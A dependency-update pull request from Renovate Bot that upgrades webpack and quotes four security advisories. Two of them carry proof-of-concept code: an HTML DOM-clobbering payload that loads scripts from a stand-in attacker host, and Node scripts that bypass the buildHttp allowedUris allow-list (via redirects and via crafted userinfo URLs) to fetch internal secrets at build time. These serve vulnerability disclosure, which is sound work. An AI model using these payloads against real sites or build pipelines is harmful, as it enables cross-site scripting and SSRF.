Update dependency webpack to v5.104.1 [SECURITY] (master)

[renovatebot-confluentinc]

For any questions/concerns about this PR, please review the Renovate Bot wiki/FAQs, or the #renovatebot Slack channel.

This PR contains the following updates:

Package	Change	Age	Adoption	Passing	Confidence
webpack	5.60.0 -> 5.104.1

---

Warning

Some dependencies could not be looked up. Check the warning logs for more information.

GitHub Vulnerability Alerts

CVE-2023-28154

Webpack 5 before 5.76.0 does not avoid cross-realm object access. ImportParserPlugin.js mishandles the magic comment feature. An attacker who controls a property of an untrusted object can obtain access to the real global object.

---

Cross-realm object access in Webpack 5

CVE-2023-28154 / GHSA-hc6q-2mpp-qw7j

More information

Details

Webpack 5 before 5.76.0 does not avoid cross-realm object access. ImportParserPlugin.js mishandles the magic comment feature. An attacker who controls a property of an untrusted object can obtain access to the real global object.

Severity

• CVSS Score: 9.8 / 10 (Critical)
• Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

References

• https://nvd.nist.gov/vuln/detail/CVE-2023-28154
• https://github.com/webpack/webpack/pull/16500
• https://github.com/webpack/webpack/compare/v5.75.0...v5.76.0
• https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AU7BOXTBK3KDYSWH67ASZ22TUIOZ3X5G
• https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PPSAXUTXBCCTAHTCX5BUR4YVP25XALQ3
• https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U2AFCM6FFE3LRYI6KNEQWKMXMQOBZQ2D

This data is provided by OSV and the GitHub Advisory Database (CC-BY 4.0).

---

Webpack's AutoPublicPathRuntimeModule has a DOM Clobbering Gadget that leads to XSS

CVE-2024-43788 / GHSA-4vvj-4cpr-p986

More information

Details

Summary

We discovered a DOM Clobbering vulnerability in Webpack’s AutoPublicPathRuntimeModule. The DOM Clobbering gadget in the module can lead to cross-site scripting (XSS) in web pages where scriptless attacker-controlled HTML elements (e.g., an img tag with an unsanitized name attribute) are present.

We found the real-world exploitation of this gadget in the Canvas LMS which allows XSS attack happens through an javascript code compiled by Webpack (the vulnerable part is from Webpack). We believe this is a severe issue. If Webpack’s code is not resilient to DOM Clobbering attacks, it could lead to significant security vulnerabilities in any web application using Webpack-compiled code.

Details

Backgrounds

DOM Clobbering is a type of code-reuse attack where the attacker first embeds a piece of non-script, seemingly benign HTML markups in the webpage (e.g. through a post or comment) and leverages the gadgets (pieces of js code) living in the existing javascript code to transform it into executable code. More for information about DOM Clobbering, here are some references:

[1] https://scnps.co/papers/sp23_domclob.pdf
[2] https://research.securitum.com/xss-in-amp4email-dom-clobbering/

Gadgets found in Webpack

We identified a DOM Clobbering vulnerability in Webpack’s AutoPublicPathRuntimeModule. When the output.publicPath field in the configuration is not set or is set to auto, the following code is generated in the bundle to dynamically resolve and load additional JavaScript files:

/******/ 	/* webpack/runtime/publicPath */
/******/ 	(() => {
/******/ 		var scriptUrl;
/******/ 		if (__webpack_require__.g.importScripts) scriptUrl = __webpack_require__.g.location + "";
/******/ 		var document = __webpack_require__.g.document;
/******/ 		if (!scriptUrl && document) {
/******/ 			if (document.currentScript)
/******/ 				scriptUrl = document.currentScript.src;
/******/ 			if (!scriptUrl) {
/******/ 				var scripts = document.getElementsByTagName("script");
/******/ 				if(scripts.length) {
/******/ 					var i = scripts.length - 1;
/******/ 					while (i > -1 && (!scriptUrl || !/^http(s?):/.test(scriptUrl))) scriptUrl = scripts[i--].src;
/******/ 				}
/******/ 			}
/******/ 		}
/******/ 		// When supporting browsers where an automatic publicPath is not supported you must specify an output.publicPath manually via configuration
/******/ 		// or pass an empty string ("") and set the __webpack_public_path__ variable from your code to use your own logic.
/******/ 		if (!scriptUrl) throw new Error("Automatic publicPath is not supported in this browser");
/******/ 		scriptUrl = scriptUrl.replace(/#.*$/, "").replace(/\?.*$/, "").replace(/\/[^\/]+$/, "/");
/******/ 		__webpack_require__.p = scriptUrl;
/******/ 	})();

However, this code is vulnerable to a DOM Clobbering attack. The lookup on the line with document.currentScript can be shadowed by an attacker, causing it to return an attacker-controlled HTML element instead of the current script element as intended. In such a scenario, the src attribute of the attacker-controlled element will be used as the scriptUrl and assigned to __webpack_require__.p. If additional scripts are loaded from the server, __webpack_require__.p will be used as the base URL, pointing to the attacker's domain. This could lead to arbitrary script loading from the attacker's server, resulting in severe security risks.

PoC

Please note that we have identified a real-world exploitation of this vulnerability in the Canvas LMS. Once the issue has been patched, I am willing to share more details on the exploitation. For now, I’m providing a demo to illustrate the concept.

Consider a website developer with the following two scripts, entry.js and import1.js, that are compiled using Webpack:

// entry.js
import('./import1.js')
  .then(module => {
    module.hello();
  })
  .catch(err => {
    console.error('Failed to load module', err);
  });

// import1.js
export function hello () {
  console.log('Hello');
}

The webpack.config.js is set up as follows:

const path = require('path');

module.exports = {
  entry: './entry.js', // Ensure the correct path to your entry file
  output: {
    filename: 'webpack-gadgets.bundle.js', // Output bundle file
    path: path.resolve(__dirname, 'dist'), // Output directory
    publicPath: "auto", // Or leave this field not set
  },
  target: 'web',
  mode: 'development',
};

When the developer builds these scripts into a bundle and adds it to a webpage, the page could load the import1.js file from the attacker's domain, attacker.controlled.server. The attacker only needs to insert an img tag with the name attribute set to currentScript. This can be done through a website's feature that allows users to embed certain script-less HTML (e.g., markdown renderers, web email clients, forums) or via an HTML injection vulnerability in third-party JavaScript loaded on the page.

<!DOCTYPE html>
<html>
<head>
  <title>Webpack Example</title>
  <!-- Attacker-controlled Script-less HTML Element starts--!>
  <img name="currentScript" src="https://attacker.controlled.server/"></img>
  <!-- Attacker-controlled Script-less HTML Element ends--!>
</head>
<script src="./dist/webpack-gadgets.bundle.js"></script>
<body>
</body>
</html>

Impact

This vulnerability can lead to cross-site scripting (XSS) on websites that include Webpack-generated files and allow users to inject certain scriptless HTML tags with improperly sanitized name or id attributes.

Patch

A possible patch to this vulnerability could refer to the Google Closure project which makes itself resistant to DOM Clobbering attack: https://github.com/google/closure-library/blob/b312823ec5f84239ff1db7526f4a75cba0420a33/closure/goog/base.js#L174

/******/ 	/* webpack/runtime/publicPath */
/******/ 	(() => {
/******/ 		var scriptUrl;
/******/ 		if (__webpack_require__.g.importScripts) scriptUrl = __webpack_require__.g.location + "";
/******/ 		var document = __webpack_require__.g.document;
/******/ 		if (!scriptUrl && document) {
/******/ 			if (document.currentScript && document.currentScript.tagName.toUpperCase() === 'SCRIPT') // Assume attacker cannot control script tag, otherwise it is XSS already :>
/******/ 				scriptUrl = document.currentScript.src;
/******/ 			if (!scriptUrl) {
/******/ 				var scripts = document.getElementsByTagName("script");
/******/ 				if(scripts.length) {
/******/ 					var i = scripts.length - 1;
/******/ 					while (i > -1 && (!scriptUrl || !/^http(s?):/.test(scriptUrl))) scriptUrl = scripts[i--].src;
/******/ 				}
/******/ 			}
/******/ 		}
/******/ 		// When supporting browsers where an automatic publicPath is not supported you must specify an output.publicPath manually via configuration
/******/ 		// or pass an empty string ("") and set the __webpack_public_path__ variable from your code to use your own logic.
/******/ 		if (!scriptUrl) throw new Error("Automatic publicPath is not supported in this browser");
/******/ 		scriptUrl = scriptUrl.replace(/#.*$/, "").replace(/\?.*$/, "").replace(/\/[^\/]+$/, "/");
/******/ 		__webpack_require__.p = scriptUrl;
/******/ 	})();

Please note that if we do not receive a response from the development team within three months, we will disclose this vulnerability to the CVE agent.

Severity

• CVSS Score: 6.4 / 10 (Medium)
• Vector String: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:H

References

• https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986
• https://nvd.nist.gov/vuln/detail/CVE-2024-43788
• https://github.com/webpack/webpack/issues/18718#issuecomment-2326296270
• https://github.com/webpack/webpack/commit/955e057abc6cc83cbc3fa1e1ef67a49758bf5a61
• https://github.com/webpack/webpack
• https://research.securitum.com/xss-in-amp4email-dom-clobbering
• https://scnps.co/papers/sp23_domclob.pdf

This data is provided by OSV and the GitHub Advisory Database (CC-BY 4.0).

---

webpack buildHttp HttpUriPlugin allowedUris bypass via HTTP redirects → SSRF + cache persistence

CVE-2025-68157 / GHSA-38r7-794h-5758

More information

Details

Summary

When experiments.buildHttp is enabled, webpack’s HTTP(S) resolver (HttpUriPlugin) enforces allowedUris only for the initial URL, but does not re-validate allowedUris after following HTTP 30x redirects. As a result, an import that appears restricted to a trusted allow-list can be redirected to HTTP(S) URLs outside the allow-list. This is a policy/allow-list bypass that enables build-time SSRF behavior (requests from the build machine to internal-only endpoints, depending on network access) and untrusted content inclusion in build outputs (redirected content is treated as module source and bundled). In my reproduction, the internal response is also persisted in the buildHttp cache.

Details

In the HTTP scheme resolver, the allow-list check (allowedUris) is performed when metadata/info is created for the original request (via getInfo()), but the content-fetch path follows redirects by resolving the Location URL without re-checking whether the redirected URL is within allowedUris.

Practical consequence: if an “allowed” host/path can return a 302 (or has an open redirect), it can point to an external URL or an internal-only URL (SSRF). The redirected response is consumed as module content, bundled, and can be cached. If the redirect target is attacker-controlled, this can potentially result in attacker-controlled JavaScript being bundled and later executed when the resulting bundle runs.

Figure 1 (evidence screenshot): left pane shows the allowed host issuing a 302 redirect to http://127.0.0.1:9100/secret.js; right pane shows the build output confirming allow-list bypass and that the secret appears in the bundle and buildHttp cache.

PoC

This PoC is intentionally constrained to 127.0.0.1 (localhost-only “internal service”) to demonstrate SSRF behavior safely.

1) Setup

mkdir split-ssrf-poc && cd split-ssrf-poc
npm init -y
npm i -D webpack webpack-cli

2) Create server.js

#!/usr/bin/env node
"use strict";

const http = require("http");
const url = require("url");

const allowedPort = 9000;
const internalPort = 9100;

const internalUrlDefault = `http://127.0.0.1:${internalPort}/secret.js`;
const secret = `INTERNAL_ONLY_SECRET_${Math.random().toString(16).slice(2)}`;
const internalPayload =
  `export const secret = ${JSON.stringify(secret)};\n` +
  `export default "ok";\n`;

function start(port, handler) {
  return new Promise(resolve => {
    const s = http.createServer(handler);
    s.listen(port, "127.0.0.1", () => resolve(s));
  });
}

(async () => {
  // Internal-only service (SSRF target)
  await start(internalPort, (req, res) => {
    if (req.url === "/secret.js") {
      res.statusCode = 200;
      res.setHeader("Content-Type", "application/javascript; charset=utf-8");
      res.end(internalPayload);
      console.log(`[internal] 200 /secret.js served (secret=${secret})`);
      return;
    }
    res.statusCode = 404;
    res.end("not found");
  });

  // Allowed host (redirector)
  await start(allowedPort, (req, res) => {
    const parsed = url.parse(req.url, true);

    if (parsed.pathname === "/redirect.js") {
      const to = parsed.query.to || internalUrlDefault;

      // Safety guard: only allow redirecting to localhost internal service in this PoC
      if (!to.startsWith(`http://127.0.0.1:${internalPort}/`)) {
        res.statusCode = 400;
        res.end("to must be internal-only in this PoC");
        console.log(`[allowed] blocked redirect to: ${to}`);
        return;
      }

      res.statusCode = 302;
      res.setHeader("Location", to);
      res.end("redirecting");
      console.log(`[allowed] 302 /redirect.js -> ${to}`);
      return;
    }

    res.statusCode = 404;
    res.end("not found");
  });

  console.log(`\nServer running:`);
  console.log(`- allowed host:  http://127.0.0.1:${allowedPort}/redirect.js`);
  console.log(`- internal-only: http://127.0.0.1:${internalPort}/secret.js`);
})();

3) Create attacker.js

#!/usr/bin/env node
"use strict";

const path = require("path");
const os = require("os");
const fs = require("fs/promises");
const webpack = require("webpack");
const webpackPkg = require("webpack/package.json");

const allowedPort = 9000;
const internalPort = 9100;

const allowedBase = `http://127.0.0.1:${allowedPort}/`;
const internalTarget = `http://127.0.0.1:${internalPort}/secret.js`;
const entryUrl = `${allowedBase}redirect.js?to=${encodeURIComponent(internalTarget)}`;

async function walk(dir) {
  const out = [];
  const items = await fs.readdir(dir, { withFileTypes: true });
  for (const it of items) {
    const p = path.join(dir, it.name);
    if (it.isDirectory()) out.push(...await walk(p));
    else if (it.isFile()) out.push(p);
  }
  return out;
}

async function fileContains(f, needle) {
  try {
    const buf = await fs.readFile(f);
    return buf.toString("utf8").includes(needle) || buf.toString("latin1").includes(needle);
  } catch {
    return false;
  }
}

async function findInFiles(files, needle) {
  const hits = [];
  for (const f of files) if (await fileContains(f, needle)) hits.push(f);
  return hits;
}

const fmtBool = b => (b ? "✅" : "❌");

(async () => {
  const tmp = await fs.mkdtemp(path.join(os.tmpdir(), "webpack-attacker-"));
  const srcDir = path.join(tmp, "src");
  const distDir = path.join(tmp, "dist");
  const cacheDir = path.join(tmp, ".buildHttp-cache");
  const lockfile = path.join(tmp, "webpack.lock");
  const bundlePath = path.join(distDir, "bundle.js");

  await fs.mkdir(srcDir, { recursive: true });
  await fs.mkdir(distDir, { recursive: true });

  await fs.writeFile(
    path.join(srcDir, "index.js"),
    `import { secret } from ${JSON.stringify(entryUrl)};
console.log("LEAKED_SECRET:", secret);
export default secret;
`
  );

  const config = {
    context: tmp,
    mode: "development",
    entry: "./src/index.js",
    output: { path: distDir, filename: "bundle.js" },
    experiments: {
      buildHttp: {
        allowedUris: [allowedBase],
        cacheLocation: cacheDir,
        lockfileLocation: lockfile,
        upgrade: true
      }
    }
  };

  const compiler = webpack(config);

  compiler.run(async (err, stats) => {
    try {
      if (err) throw err;

      const info = stats.toJson({ all: false, errors: true, warnings: true });
      if (stats.hasErrors()) {
        console.error(info.errors);
        process.exitCode = 1;
        return;
      }

      const bundle = await fs.readFile(bundlePath, "utf8");
      const m = bundle.match(/INTERNAL_ONLY_SECRET_[0-9a-f]+/i);
      const secret = m ? m[0] : null;

      console.log("\n[ATTACKER RESULT]");
      console.log(`- webpack version: ${webpackPkg.version}`);
      console.log(`- node version: ${process.version}`);
      console.log(`- allowedUris: ${JSON.stringify([allowedBase])}`);
      console.log(`- imported URL (allowed only): ${entryUrl}`);
      console.log(`- temp dir: ${tmp}`);
      console.log(`- lockfile: ${lockfile}`);
      console.log(`- cacheDir: ${cacheDir}`);
      console.log(`- bundle:   ${bundlePath}`);

      if (!secret) {
        console.log("\n[SECURITY SUMMARY]");
        console.log(`- bundle contains internal secret marker: ${fmtBool(false)}`);
        return;
      }

      const lockHit = await fileContains(lockfile, secret);

      let cacheFiles = [];
      try { cacheFiles = await walk(cacheDir); } catch { cacheFiles = []; }
      const cacheHit = cacheFiles.length ? (await findInFiles(cacheFiles, secret)).length > 0 : false;

      const allTmpFiles = await walk(tmp);
      const allHits = await findInFiles(allTmpFiles, secret);

      console.log(`\n- extracted secret marker from bundle: ${secret}`);

      console.log("\n[SECURITY SUMMARY]");
      console.log(`- Redirect allow-list bypass: ${fmtBool(true)} (imported allowed URL, but internal target was fetched)`);
      console.log(`- Internal target (SSRF-like): ${internalTarget}`);
      console.log(`- EXPECTED: internal target should be BLOCKED by allowedUris`);
      console.log(`- ACTUAL: internal content treated as module and bundled`);

      console.log("\n[EVIDENCE CHECKLIST]");
      console.log(`- bundle contains secret:   ${fmtBool(true)}`);
      console.log(`- cache contains secret:    ${fmtBool(cacheHit)}`);
      console.log(`- lockfile contains secret: ${fmtBool(lockHit)}`);

      console.log("\n[PERSISTENCE CHECK] files containing secret");
      for (const f of allHits.slice(0, 30)) console.log(`- ${f}`);
      if (allHits.length > 30) console.log(`- ... and ${allHits.length - 30} more`);
    } catch (e) {
      console.error(e);
      process.exitCode = 1;
    } finally {
      compiler.close(() => {});
    }
  });
})();

4) Run

Terminal A:

node server.js

Terminal B:

node attacker.js

5) Expected

Expected: Redirect target should be rejected if not in allowedUris (only http://127.0.0.1:9000/ is allowed).

Impact

Vulnerability class: Policy/allow-list bypass leading to SSRF behavior at build time and untrusted content inclusion in build outputs (and potentially bundling of attacker-controlled JavaScript if the redirect target is attacker-controlled).

Who is impacted: Projects that enable experiments.buildHttp and rely on allowedUris as a security boundary (to restrict remote module fetching). In such environments, an attacker who can influence imported URLs (e.g., via source contribution, dependency manipulation, or configuration) and can cause an allowed endpoint to redirect can:

trigger network requests from the build machine to internal-only services (SSRF behavior),

cause content from outside the allow-list to be bundled into build outputs,

and cause fetched responses to persist in build artifacts (e.g., buildHttp cache), increasing the risk of later exfiltration.

Severity

• CVSS Score: 3.7 / 10 (Low)
• Vector String: CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:L/I:L/A:N

References

• https://github.com/webpack/webpack/security/advisories/GHSA-38r7-794h-5758
• https://github.com/webpack/webpack

This data is provided by OSV and the GitHub Advisory Database (CC-BY 4.0).

---

webpack buildHttp: allowedUris allow-list bypass via URL userinfo (@​) leading to build-time SSRF behavior

CVE-2025-68458 / GHSA-8fgc-7cc6-rx7x

More information

Details

Summary

When experiments.buildHttp is enabled, webpack’s HTTP(S) resolver (HttpUriPlugin) can be bypassed to fetch resources from hosts outside allowedUris by using crafted URLs that include userinfo (username:password@host). If allowedUris enforcement relies on a raw string prefix check (e.g., uri.startsWith(allowed)), a URL that looks allow-listed can pass validation while the actual network request is sent to a different authority/host after URL parsing. This is a policy/allow-list bypass that enables build-time SSRF behavior (outbound requests from the build machine to internal-only endpoints, depending on network access) and untrusted content inclusion (the fetched response is treated as module source and bundled). In my reproduction, the internal response was also persisted in the buildHttp cache.

Reproduced on:

• webpack version: 5.104.0
• Node version: v18.19.1

Details

Root cause (high level): allowedUris validation can be performed on the raw URI string, while the actual request destination is determined later by parsing the URL (e.g., new URL(uri)), which interprets the authority as the part after @.

Example crafted URL:

• http://127.0.0.1:9000@​127.0.0.1:9100/secret.js

If the allow-list is ["http://127.0.0.1:9000"], then:

• Raw string check:
  crafted.startsWith("http://127.0.0.1:9000") → true
• URL parsing (WHAT new URL() will contact):
  origin → http://127.0.0.1:9100 (host/port after @)

As a result, webpack fetches http://127.0.0.1:9100/secret.js even though allowedUris only included http://127.0.0.1:9000.

Evidence from reproduction:

• Server logs showed the internal-only endpoint being fetched:
  • [internal] 200 /secret.js served (...) (observed multiple times)
• Attacker-side build output showed:
  • the internal secret marker was present in the bundle
  • the internal secret marker was present in the buildHttp cache

PoC

This PoC is intentionally constrained to 127.0.0.1 (localhost-only “internal service”) to demonstrate SSRF behavior safely.

1) Setup

mkdir split-userinfo-poc && cd split-userinfo-poc
npm init -y
npm i -D webpack webpack-cli

2) Create server.js

#!/usr/bin/env node
"use strict";

const http = require("http");

const ALLOWED_PORT = 9000;   // allowlisted-looking host
const INTERNAL_PORT = 9100;  // actual target if bypass succeeds

const secret = `INTERNAL_ONLY_SECRET_${Math.random().toString(16).slice(2)}`;
const internalPayload =
  `// internal-only\n` +
  `export const secret = ${JSON.stringify(secret)};\n` +
  `export default "ok";\n`;

function listen(port, handler) {
  return new Promise(resolve => {
    const s = http.createServer(handler);
    s.listen(port, "127.0.0.1", () => resolve(s));
  });
}

(async () => {
  // "Allowed" host (should NOT be contacted if bypass works as intended)
  await listen(ALLOWED_PORT, (req, res) => {
    console.log(`[allowed-host] ${req.method} ${req.url} (should NOT be hit in userinfo bypass)`);
    res.statusCode = 200;
    res.setHeader("Content-Type", "application/javascript; charset=utf-8");
    res.end(`export default "ALLOWED_HOST_WAS_HIT_UNEXPECTEDLY";\n`);
  });

  // Internal-only service (SSRF-like target)
  await listen(INTERNAL_PORT, (req, res) => {
    if (req.url === "/secret.js") {
      console.log(`[internal] 200 /secret.js served (secret=${secret})`);
      res.statusCode = 200;
      res.setHeader("Content-Type", "application/javascript; charset=utf-8");
      res.end(internalPayload);
      return;
    }
    console.log(`[internal] 404 ${req.method} ${req.url}`);
    res.statusCode = 404;
    res.end("not found");
  });

  console.log("\nServers up:");
  console.log(`- allowed-host (should NOT be contacted): http://127.0.0.1:${ALLOWED_PORT}/`);
  console.log(`- internal target (should be contacted if vulnerable): http://127.0.0.1:${INTERNAL_PORT}/secret.js`);
})();

2) Create server.js

#!/usr/bin/env node
"use strict";

const path = require("path");
const os = require("os");
const fs = require("fs/promises");
const webpack = require("webpack");

function fmtBool(b) { return b ? "✅" : "❌"; }

async function walk(dir) {
  const out = [];
  let items;
  try { items = await fs.readdir(dir, { withFileTypes: true }); }
  catch { return out; }
  for (const it of items) {
    const p = path.join(dir, it.name);
    if (it.isDirectory()) out.push(...await walk(p));
    else if (it.isFile()) out.push(p);
  }
  return out;
}

async function fileContains(f, needle) {
  try {
    const buf = await fs.readFile(f);
    const s1 = buf.toString("utf8");
    if (s1.includes(needle)) return true;
    const s2 = buf.toString("latin1");
    return s2.includes(needle);
  } catch {
    return false;
  }
}

(async () => {
  const webpackVersion = require("webpack/package.json").version;

  const ALLOWED_PORT = 9000;
  const INTERNAL_PORT = 9100;

  // NOTE: allowlist is intentionally specified without a trailing slash
  // to demonstrate the risk of raw string prefix checks.
  const allowedUri = `http://127.0.0.1:${ALLOWED_PORT}`;

  // Crafted URL using userinfo so that:
  // - The string begins with allowedUri
  // - The actual authority (host:port) after '@​' is INTERNAL_PORT
  const crafted = `http://127.0.0.1:${ALLOWED_PORT}@​127.0.0.1:${INTERNAL_PORT}/secret.js`;
  const parsed = new URL(crafted);

  const tmp = await fs.mkdtemp(path.join(os.tmpdir(), "webpack-httpuri-userinfo-poc-"));
  const srcDir = path.join(tmp, "src");
  const distDir = path.join(tmp, "dist");
  const cacheDir = path.join(tmp, ".buildHttp-cache");
  const lockfile = path.join(tmp, "webpack.lock");
  const bundlePath = path.join(distDir, "bundle.js");

  await fs.mkdir(srcDir, { recursive: true });
  await fs.mkdir(distDir, { recursive: true });

  await fs.writeFile(
    path.join(srcDir, "index.js"),
    `import { secret } from ${JSON.stringify(crafted)};
console.log("LEAKED_SECRET:", secret);
export default secret;
`
  );

  const config = {
    context: tmp,
    mode: "development",
    entry: "./src/index.js",
    output: { path: distDir, filename: "bundle.js" },
    experiments: {
      buildHttp: {
        allowedUris: [allowedUri],
        cacheLocation: cacheDir,
        lockfileLocation: lockfile,
        upgrade: true
      }
    }
  };

  console.log("\n[ENV]");
  console.log(`- webpack version: ${webpackVersion}`);
  console.log(`- node version:    ${process.version}`);
  console.log(`- allowedUris:     ${JSON.stringify([allowedUri])}`);

  console.log("\n[CRAFTED URL]");
  console.log(`- import specifier: ${crafted}`);
  console.log(`- WHAT startsWith() sees: begins with "${allowedUri}" => ${fmtBool(crafted.startsWith(allowedUri))}`);
  console.log(`- WHAT URL() parses:`);
  console.log(`  - username: ${JSON.stringify(parsed.username)} (userinfo)`);
  console.log(`  - password: ${JSON.stringify(parsed.password)} (userinfo)`);
  console.log(`  - hostname: ${parsed.hostname}`);
  console.log(`  - port:     ${parsed.port}`);
  console.log(`  - origin:   ${parsed.origin}`);
  console.log(`  - NOTE: request goes to origin above (host/port after @​), not to "${allowedUri}"`);

  const compiler = webpack(config);

  compiler.run(async (err, stats) => {
    try {
      if (err) throw err;
      const info = stats.toJson({ all: false, errors: true, warnings: true });

      if (stats.hasErrors()) {
        console.error("\n[WEBPACK ERRORS]");
        console.error(info.errors);
        process.exitCode = 1;
        return;
      }

      const bundle = await fs.readFile(bundlePath, "utf8");
      const m = bundle.match(/INTERNAL_ONLY_SECRET_[0-9a-f]+/i);
      const foundSecret = m ? m[0] : null;

      console.log("\n[RESULT]");
      console.log(`- temp dir:  ${tmp}`);
      console.log(`- bundle:    ${bundlePath}`);
      console.log(`- lockfile:  ${lockfile}`);
      console.log(`- cacheDir:  ${cacheDir}`);

      console.log("\n[SECURITY CHECK]");
      console.log(`- bundle contains INTERNAL_ONLY_SECRET_* : ${fmtBool(!!foundSecret)}`);

      if (foundSecret) {
        const lockHit = await fileContains(lockfile, foundSecret);

        const cacheFiles = await walk(cacheDir);
        let cacheHit = false;
        for (const f of cacheFiles) {
          if (await fileContains(f, foundSecret)) { cacheHit = true; break; }
        }

        console.log(`- lockfile contains secret: ${fmtBool(lockHit)}`);
        console.log(`- cache contains secret:    ${fmtBool(cacheHit)}`);
      }
    } catch (e) {
      console.error(e);
      process.exitCode = 1;
    } finally {
      compiler.close(() => {});
    }
  });
})();

4) Run

Terminal A:

node server.js

Terminal B:

node attacker.js

5) Expected vs Actual

Expected: The import should be blocked because the effective request destination is http://127.0.0.1:9100/secret.js, which is outside allowedUris (only http://127.0.0.1:9000 is allow-listed).

Actual: The crafted URL passes the allow-list prefix validation, webpack fetches the internal-only resource on port 9100 (confirmed by server logs), and the secret marker appears in the bundle and buildHttp cache.

Impact

Vulnerability class: Policy/allow-list bypass leading to build-time SSRF behavior and untrusted content inclusion in build outputs.

Who is impacted: Projects that enable experiments.buildHttp and rely on allowedUris as a security boundary. If an attacker can influence the imported HTTP(S) specifier (e.g., via source contribution, dependency manipulation, or configuration), they can cause outbound requests from the build environment to endpoints outside the allow-list (including internal-only services, subject to network reachability). The fetched response can be treated as module source and included in build outputs and persisted in the buildHttp cache, increasing the risk of leakage or supply-chain contamination.

Severity

• CVSS Score: 3.7 / 10 (Low)
• Vector String: CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:L/I:L/A:N

References

• https://github.com/webpack/webpack/security/advisories/GHSA-8fgc-7cc6-rx7x
• https://github.com/webpack/webpack

This data is provided by OSV and the GitHub Advisory Database (CC-BY 4.0).

---

Configuration

📅 Schedule: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

♻ Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

---

• If you want to rebase/retry this PR, check this box

---

This PR has been generated by Renovate Bot.

[service-bot-app]

Could not automerge PR: Found a file in the diff that is not marked as an approved dependency file: pickup-data-adventure-game/client/yarn.lock